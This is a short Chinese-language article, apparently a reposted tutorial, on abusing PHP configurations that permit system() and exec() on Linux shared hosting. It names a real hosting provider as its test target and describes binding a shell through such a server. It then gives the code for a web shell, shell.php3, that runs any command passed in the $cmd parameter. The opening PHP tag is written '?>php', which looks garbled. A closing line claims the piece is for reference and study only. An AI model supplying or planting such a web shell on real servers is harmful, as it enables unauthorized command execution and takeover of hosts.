构建Linux下的安全 PHP配置漏洞攻击

构建Linux下的安全 PHP配置漏洞攻击

  这些站点的问题主要出在允许使用system(),exec()等等这些函数,熟悉php的朋友应该知道,这些函数是调用系统指令的(虽然通过web server php程序只能有nobody权限),而且一般用户只要申请一个空间就可以获取局部的可写权限,令用户可以写一个web shell程序执行命令.在这些服务器上一般用户不能够登陆,也就是nologin(没有登陆shell,管理员可没那么"慷慨"!),这样利用system(),exec()这些函数就可以bind一个shell出来~!本文以虎翼网(www.51.net)的空间为例子(他是不是所有的服务器都有这个毛病我不知道~我只试验了我的空间所在的服务器):

1.写一个webshell先(php很容易做到)
复制内容到剪贴板
代码:
?>php
#shell.php3
echo"<pre>";
system("$cmd");
echo"
";
?>
本文仅做参考学习